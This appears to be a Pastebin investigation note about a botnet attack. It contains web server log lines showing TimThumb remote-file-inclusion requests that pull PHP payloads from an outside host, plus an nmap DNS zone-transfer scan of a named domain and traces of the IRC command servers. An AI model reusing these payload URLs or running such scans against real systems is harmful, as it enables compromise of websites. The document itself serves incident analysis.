Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- server1.justicesolutionsllc.com - - [28/May/2012:09:57:59 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:27 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- http://justicesolutionsllc.com/
- nmap --open --reason --script dns-zone-transfer.nse justicesolutionsllc.com
- Starting Nmap 6.00 ( http://nmap.org ) at 2012-05-28 18:38 Eastern Daylight Time
- Nmap scan report for justicesolutionsllc.com (216.67.225.113)
- Host is up, received reset (0.026s latency).
- rDNS record for 216.67.225.113: server1.justicesolutionsllc.com
- Not shown: 979 closed ports
- Reason: 979 resets
- PORT STATE SERVICE REASON
- 1/tcp open tcpmux syn-ack
- 21/tcp open ftp syn-ack
- 25/tcp open smtp syn-ack
- 53/tcp open domain syn-ack
- | dns-zone-transfer:
- | justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
- | justicesolutionsllc.com MX justicesolutionsllc.com
- | justicesolutionsllc.com NS ns1.justicesolutionsllc.com
- | justicesolutionsllc.com NS ns2.justicesolutionsllc.com
- | justicesolutionsllc.com A 216.67.225.113
- | cpanel.justicesolutionsllc.com A 216.67.225.113
- | ftp.justicesolutionsllc.com A 216.67.225.113
- | localhost.justicesolutionsllc.com A 127.0.0.1
- | mail.justicesolutionsllc.com CNAME justicesolutionsllc.com
- | ns1.justicesolutionsllc.com A 216.67.225.113
- | ns2.justicesolutionsllc.com A 208.116.44.41
- | server1.justicesolutionsllc.com A 208.116.44.41
- | webdisk.justicesolutionsllc.com A 216.67.225.113
- | webmail.justicesolutionsllc.com A 216.67.225.113
- | whm.justicesolutionsllc.com A 216.67.225.113
- | www.justicesolutionsllc.com CNAME justicesolutionsllc.com
- |_justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
- 80/tcp open http syn-ack
- 100/tcp open newacct syn-ack
- 110/tcp open pop3 syn-ack
- 111/tcp open rpcbind syn-ack
- 143/tcp open imap syn-ack
- 443/tcp open https syn-ack
- 465/tcp open smtps syn-ack
- 587/tcp open submission syn-ack
- 993/tcp open imaps syn-ack
- 995/tcp open pop3s syn-ack
- 3306/tcp open mysql syn-ack
- 6667/tcp open irc syn-ack
- 6668/tcp open irc syn-ack
- 6669/tcp open irc syn-ack
- 7000/tcp open afs3-fileserver syn-ack
- 8000/tcp open http-alt syn-ack
- 8001/tcp open vcom-tunnel syn-ack
- | server1.justicesolutionsllc.com A 208.116.44.41
- 208.116.44.41 redirects to wylandflorida.com
- Non-authoritative answer:
- Name: wylandflorida.com
- Address: 216.67.225.113
- wylandflorida.com comes back to 216.67.225.113 which aliases to server1.justicesolutionsllc.com
- http://justicesolutionsllc.com:6669 = irc.siantar.org
- :server1.siantar.org NOTICE AUTH :*** Looking up your hostname...
- :server1.siantar.org NOTICE AUTH :*** Checking ident...
- :server1.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
- :server1.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
- :server1.siantar.org 451 GET :You have not registered
- :server1.siantar.org 451 User-Agent: :You have not registered
- :server1.siantar.org 451 Host: :You have not registered
- :server1.siantar.org 451 Accept: :You have not registered
- :server1.siantar.org 451 Accept-Language: :You have not registered
- :server1.siantar.org 451 Accept-Encoding: :You have not registered
- :server1.siantar.org 451 Connection: :You have not registered
- PING irc.siantar.org (173.44.171.98) 56(84) bytes of data.
- http://173.44.171.98:6669/
- :server2.siantar.org NOTICE AUTH :*** Looking up your hostname...
- :server2.siantar.org NOTICE AUTH :*** Checking ident...
- :server2.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
- :server2.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
- :server2.siantar.org 451 GET :You have not registered
- :server2.siantar.org 451 User-Agent: :You have not registered
- :server2.siantar.org 451 Host: :You have not registered
- :server2.siantar.org 451 Accept: :You have not registered
- :server2.siantar.org 451 Accept-Language: :You have not registered
- :server2.siantar.org 451 Accept-Encoding: :You have not registered
- :server2.siantar.org 451 Connection: :You have not registered
- siantar.org redirects to http://globalnetsiantar.blogspot.com/
- http://blogger.com.lochin.org/
- Non-authoritative answer:
- Name: lochin.org
- Address: 94.141.22.74
- Non-authoritative answer:
- Name: blogger.com.lochin.org
- Address: 94.141.22.74
- Name: srv-hp6.netsons.net
- Address: 94.141.22.74
- ____________________________________________
- irc.siantar.org channels used to scan websites for TimThumb vulns, bots post back findings and list backdoors installed on servers.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement